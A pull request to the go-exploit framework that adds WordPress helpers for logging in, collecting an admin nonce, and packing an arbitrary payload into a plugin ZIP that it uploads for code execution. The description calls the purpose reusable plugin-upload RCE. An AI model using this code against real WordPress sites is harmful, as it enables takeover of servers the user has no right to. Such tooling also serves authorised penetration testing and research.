### PR TITLE
Add the "product" and "product/wordpress" structure

### DIFF
--- a/product/product.go
+++ b/product/product.go
@@ -1,0 +1,1 @@
+package product

--- a/product/wordpress/plugins.go
+++ b/product/wordpress/plugins.go
@@ -34,21 +34,21 @@ var (
 // Get the nonce required for administrative plugin actions.
 func getPluginNonce(conf *config.Config, cookies []*http.Cookie, path string) (string, bool) {
 	url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, "/"+path)
-	cookieString := createCookieHeader(cookies)
+	cookieString := protocol.CookieString(cookies)
 	headers := map[string]string{
 		"Cookie": cookieString,
 	}
 	resp, body, ok := protocol.HTTPSendAndRecvWithHeaders("GET", url, "", headers)
 	if !ok {
-		output.PrintError("WordPress plugin install nonce retrieval failed")
-		output.PrintfDebug("resp=%#v body=%q", resp, body)
+		output.PrintFrameworkError("WordPress plugin install nonce retrieval failed")
+		output.PrintfFrameworkDebug("resp=%#v body=%q", resp, body)
 
 		return "", false
 	}
 	re := regexp.MustCompile(`id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"`)
 	matches := re.FindStringSubmatch(body)
 	if len(matches) < 2 {
-		output.PrintError("Could not find WordPress nonce for plugin upload")
+		output.PrintFrameworkError("Could not find WordPress nonce for plugin upload")
 
 		return "", false
 	}
@@ -80,20 +80,20 @@ func GeneratePlugin(payload, name string) (string, []byte, bool) {
 	for _, file := range files {
 		f, err := w.Create(file.Name)
 		if err != nil {
-			output.PrintfError("WordPress Plugin failed to generate: %e", err)
+			output.PrintfFrameworkError("WordPress Plugin failed to generate: %e", err)
 
 			return "", []byte{}, false
 		}
 		_, err = f.Write([]byte(file.Body))
 		if err != nil {
-			output.PrintfError("WordPress Plugin failed to generate: %e", err)
+			output.PrintfFrameworkError("WordPress Plugin failed to generate: %e", err)
 
 			return "", []byte{}, false
 		}
 	}
 	err := w.Close()
 	if err != nil {
-		output.PrintfError("WordPress Plugin failed to generate: %e", err)
+		output.PrintfFrameworkError("WordPress Plugin failed to generate: %e", err)
 
 		return "", []byte{}, false
 	}
@@ -112,7 +112,7 @@ func UploadPlugin(conf *config.Config, cookies []*http.Cookie, zip []byte, name 
 	protocol.MultipartAddField(w, "_wp_http_referer", PluginInstallPath+"?tab=upload")
 	protocol.MultipartAddFile(w, "pluginzip", name+".zip", "application/octet-stream", string(zip))
 	protocol.MultipartAddField(w, "Install Now", "install-plugin-submit")
-	cookieString := createCookieHeader(cookies)
+	cookieString := protocol.CookieString(cookies)
 	headers := map[string]string{
 		"Content-Type": w.FormDataContentType(),
 		"Cookie":       cookieString,
@@ -120,8 +120,8 @@ func UploadPlugin(conf *config.Config, cookies []*http.Cookie, zip []byte, name 
 	url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, "/"+PluginUpdatePath+"?action=upload-plugin")
 	resp, body, ok := protocol.HTTPSendAndRecvWithHeaders("POST", url, builder.String(), headers)
 	if !ok || resp.StatusCode != 200 {
-		output.PrintError("WordPress plugin upload failed")
-		output.PrintfDebug("resp=%#v body=%q", resp, body)
+		output.PrintFrameworkError("WordPress plugin upload failed")
+		output.PrintfFrameworkDebug("resp=%#v body=%q", resp, body)
 
 		return "", false
 	}

--- a/product/wordpress/plugins.go
+++ b/product/wordpress/plugins.go
@@ -1,0 +1,131 @@
+package wordpress
+
+import (
+	"archive/zip"
+	"bytes"
+	"fmt"
+	"net/http"
+	"regexp"
+
+	"github.com/vulncheck-oss/go-exploit/config"
+	"github.com/vulncheck-oss/go-exploit/output"
+	"github.com/vulncheck-oss/go-exploit/protocol"
+	"github.com/vulncheck-oss/go-exploit/random"
+)
+
+// Plugin stub is required for WordPress to successfully validate that the
+// uploaded ZIP is a WordPress Plugin.
+var pluginStub = `<?php
+/*
+ * Plugin Name: %s
+ * Version: %s 
+ * Author: %s 
+ * Author URI: %s 
+ * License: GPL2
+ */
+?>`
+
+var (
+	PluginInstallPath = `wp-admin/plugin-install.php`
+	PluginUpdatePath  = `wp-admin/update.php`
+	PluginEditPath    = `wp-admin/plugin-editor.php`
+)
+
+// Get the nonce required for administrative plugin actions.
+func getPluginNonce(conf *config.Config, cookies []*http.Cookie, path string) (string, bool) {
+	url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, "/"+path)
+	cookieString := createCookieHeader(cookies)
+	headers := map[string]string{
+		"Cookie": cookieString,
+	}
+	resp, body, ok := protocol.HTTPSendAndRecvWithHeaders("GET", url, "", headers)
+	if !ok {
+		output.PrintError("WordPress plugin install nonce retrieval failed")
+		output.PrintfDebug("resp=%#v body=%q", resp, body)
+
+		return "", false
+	}
+	re := regexp.MustCompile(`id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"`)
+	matches := re.FindStringSubmatch(body)
+	if len(matches) < 2 {
+		output.PrintError("Could not find WordPress nonce for plugin upload")
+
+		return "", false
+	}
+
+	return matches[1], true
+}
+
+// Generates a ZIP containing the minimum requirement for a WordPress plugin and the provided
+// payload. This function returns the name of the internal payload and generally will be resolved to
+// `/wp-content/plugins/<name>/<payloadName>`.
+func GeneratePlugin(payload, name string) (string, []byte, bool) {
+	buf := new(bytes.Buffer)
+	w := zip.NewWriter(buf)
+
+	payloadName := random.RandLetters(10) + ".php"
+	files := []struct {
+		Name, Body string
+	}{
+		{
+			name + ".php", fmt.Sprintf(pluginStub,
+				name, // Plugin name
+				random.RandDigits(2)+"."+random.RandDigits(2)+"."+random.RandDigits(2), // Version
+				random.RandLetters(10),               // Author
+				"https://"+random.RandHex(10)+".org", // URI
+			),
+		},
+		{payloadName, payload},
+	}
+	for _, file := range files {
+		f, err := w.Create(file.Name)
+		if err != nil {
+			output.PrintfError("WordPress Plugin failed to generate: %e", err)
+
+			return "", []byte{}, false
+		}
+		_, err = f.Write([]byte(file.Body))
+		if err != nil {
+			output.PrintfError("WordPress Plugin failed to generate: %e", err)
+
+			return "", []byte{}, false
+		}
+	}
+	err := w.Close()
+	if err != nil {
+		output.PrintfError("WordPress Plugin failed to generate: %e", err)
+
+		return "", []byte{}, false
+	}
+
+	return payloadName, buf.Bytes(), true
+}
+
+// Uploads a ZIP based plugin for WordPress.
+func UploadPlugin(conf *config.Config, cookies []*http.Cookie, zip []byte, name string) (string, bool) {
+	nonce, ok := getPluginNonce(conf, cookies, PluginInstallPath)
+	if !ok {
+		return "", false
+	}
+	builder, w := protocol.MultipartCreateForm()
+	protocol.MultipartAddField(w, "_wpnonce", nonce)
+	protocol.MultipartAddField(w, "_wp_http_referer", PluginInstallPath+"?tab=upload")
+	protocol.MultipartAddFile(w, "pluginzip", name+".zip", "application/octet-stream", string(zip))
+	protocol.MultipartAddField(w, "Install Now", "install-plugin-submit")
+	cookieString := createCookieHeader(cookies)
+	headers := map[string]string{
+		"Content-Type": w.FormDataContentType(),
+		"Cookie":       cookieString,
+	}
+	url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, "/"+PluginUpdatePath+"?action=upload-plugin")
+	resp, body, ok := protocol.HTTPSendAndRecvWithHeaders("POST", url, builder.String(), headers)
+	if !ok || resp.StatusCode != 200 {
+		output.PrintError("WordPress plugin upload failed")
+		output.PrintfDebug("resp=%#v body=%q", resp, body)
+
+		return "", false
+	}
+	url = protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, "/wp-content/plugins/"+name)
+
+	return url, true
+}

--- a/product/wordpress/wordpress.go
+++ b/product/wordpress/wordpress.go
@@ -13,20 +13,6 @@ import (
 
 var LoginPath = `wp-login.php`
 
-// Turns `net/http` []*Cookie into a string for adding to the Cookie header.
-func createCookieHeader(cookies []*http.Cookie) string {
-	cookieString := ""
-	for c, cookie := range cookies {
-		if c == 0 {
-			cookieString += cookie.Name + "=" + cookie.Value + ";"
-		} else {
-			cookieString += " " + cookie.Name + "=" + cookie.Value + ";"
-		}
-	}
-
-	return cookieString
-}
-
 // Attempts to log into the WordPress instance and if successful return the cookies set by
 // WordPress.
 func Login(conf *config.Config, username, password string) ([]*http.Cookie, bool) {
@@ -41,24 +27,24 @@ func Login(conf *config.Config, username, password string) ([]*http.Cookie, bool
 	}
 	resp, body, ok := protocol.HTTPSendAndRecvWithHeadersNoRedirect("POST", url, form.Encode(), headers)
 	if !ok {
-		output.PrintError("WordPress login failed")
-		output.PrintfDebug("resp=%#v body=%q", resp, body)
+		output.PrintFrameworkError("WordPress login failed")
+		output.PrintfFrameworkDebug("resp=%#v body=%q", resp, body)
 
 		return []*http.Cookie{}, false
 	}
 	location, err := resp.Location()
 	if err != nil {
-		output.PrintError("WordPress did not return a redirect")
+		output.PrintFrameworkError("WordPress did not return a redirect")
 
 		return []*http.Cookie{}, false
 	}
 	if location.String() != form["redirect_to"][0] {
-		output.PrintError("WordPress did not redirect to the expected location")
+		output.PrintFrameworkError("WordPress did not redirect to the expected location")
 
 		return []*http.Cookie{}, false
 	}
 	if len(resp.Cookies()) < 1 {
-		output.PrintError("WordPress did respond with cookies")
+		output.PrintFrameworkError("WordPress did respond with cookies")
 
 		return []*http.Cookie{}, false
 	}
@@ -68,7 +54,7 @@ func Login(conf *config.Config, username, password string) ([]*http.Cookie, bool
 		}
 	}
 
-	output.PrintError("WordPress cookie not found")
+	output.PrintFrameworkError("WordPress cookie not found")
 
 	return []*http.Cookie{}, false
 }

--- a/product/wordpress/wordpress.go
+++ b/product/wordpress/wordpress.go
@@ -1,0 +1,74 @@
+package wordpress
+
+import (
+	"net/http"
+	"net/url"
+	"strings"
+
+	"github.com/vulncheck-oss/go-exploit/config"
+	"github.com/vulncheck-oss/go-exploit/output"
+	"github.com/vulncheck-oss/go-exploit/protocol"
+	"github.com/vulncheck-oss/go-exploit/random"
+)
+
+var LoginPath = `wp-login.php`
+
+// Turns `net/http` []*Cookie into a string for adding to the Cookie header.
+func createCookieHeader(cookies []*http.Cookie) string {
+	cookieString := ""
+	for c, cookie := range cookies {
+		if c == 0 {
+			cookieString += cookie.Name + "=" + cookie.Value + ";"
+		} else {
+			cookieString += " " + cookie.Name + "=" + cookie.Value + ";"
+		}
+	}
+
+	return cookieString
+}
+
+// Attempts to log into the WordPress instance and if successful return the cookies set by
+// WordPress.
+func Login(conf *config.Config, username, password string) ([]*http.Cookie, bool) {
+	form := url.Values{}
+	form.Add("log", username)
+	form.Add("pwd", password)
+	form.Add("wp-submit", "Login")
+	url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, "/"+LoginPath)
+	form.Add("redirect_to", url+"#"+random.RandLettersRange(10, 20))
+	headers := map[string]string{
+		"Content-Type": "application/x-www-form-urlencoded",
+	}
+	resp, body, ok := protocol.HTTPSendAndRecvWithHeadersNoRedirect("POST", url, form.Encode(), headers)
+	if !ok {
+		output.PrintError("WordPress login failed")
+		output.PrintfDebug("resp=%#v body=%q", resp, body)
+
+		return []*http.Cookie{}, false
+	}
+	location, err := resp.Location()
+	if err != nil {
+		output.PrintError("WordPress did not return a redirect")
+
+		return []*http.Cookie{}, false
+	}
+	if location.String() != form["redirect_to"][0] {
+		output.PrintError("WordPress did not redirect to the expected location")
+
+		return []*http.Cookie{}, false
+	}
+	if len(resp.Cookies()) < 1 {
+		output.PrintError("WordPress did respond with cookies")
+
+		return []*http.Cookie{}, false
+	}
+	for _, cookie := range resp.Cookies() {
+		if strings.Contains(strings.ToLower(cookie.Name), "wordpress") {
+			return resp.Cookies(), true
+		}
+	}
+
+	output.PrintError("WordPress cookie not found")
+
+	return []*http.Cookie{}, false
+}

--- a/protocol/httphelper.go
+++ b/protocol/httphelper.go
@@ -4,6 +4,7 @@ import (
 	"bufio"
 	"bytes"
 	"crypto/tls"
+
 	// vscode desperately wants to remove this.
 	_ "embed"
 	"fmt"
@@ -199,6 +200,20 @@ func DoRequest(client *http.Client, req *http.Request) (*http.Response, string, 
 	bodyBytes, _ := io.ReadAll(resp.Body)
 
 	return resp, string(bodyBytes), true
+}
+
+// Turns `net/http` []*Cookie into a string for adding to the Cookie header.
+func CookieString(cookies []*http.Cookie) string {
+	cookieString := ""
+	for c, cookie := range cookies {
+		if c == 0 {
+			cookieString += cookie.Name + "=" + cookie.Value + ";"
+		} else {
+			cookieString += " " + cookie.Name + "=" + cookie.Value + ";"
+		}
+	}
+
+	return cookieString
 }
 
 // converts a map of strings into a single string in application/x-www-urlencoded format (but does not encode the params!)

--- a/protocol/httphelper_test.go
+++ b/protocol/httphelper_test.go
@@ -1,6 +1,7 @@
 package protocol
 
 import (
+	"net/http"
 	"testing"
 )
 
@@ -58,5 +59,20 @@ func TestGenerateURL(t *testing.T) {
 	uri = GenerateURL("::1", 1270, false, "/")
 	if uri != "http://[::1]:1270/" {
 		t.Fatal(uri)
+	}
+}
+
+func TestCookieString(t *testing.T) {
+	// Normally you might not want duplicates, but there are common bugs with that handling
+	// so it might be wanted for hacks.
+	testCookies := []*http.Cookie{
+		{Name: "testname", Value: "testvalue"},
+		{Name: "testname", Value: "testvalue"},
+		{Name: "test2name", Value: "test2value"},
+		{Name: "stuff", Value: "stuff"},
+	}
+	cookieStr := CookieString(testCookies)
+	if cookieStr != `testname=testvalue; testname=testvalue; test2name=test2value; stuff=stuff;` {
+		t.Fatal(cookieStr)
 	}
 }


### PR DESCRIPTION
Currently `go-exploit` does not have any public product specific handling, but I've had to write a few WordPress plugin RCEs lately and was getting tired of reinventing the wheel.

This lays the groundwork to have product specific functions and handling. This also only implements: authentication, nonce selection, and plugin upload based RCE.

In the future I had a few thoughts that we could potentially add:

- `flag` handling for each product specific implementation allowing a `wordpress.Flags()` call so that the CLI flags can automatically inherit any product specific flags in the future.
- Offer per-product specific selection of payloads (related to above) so that you could potentially modify the exploitation path further.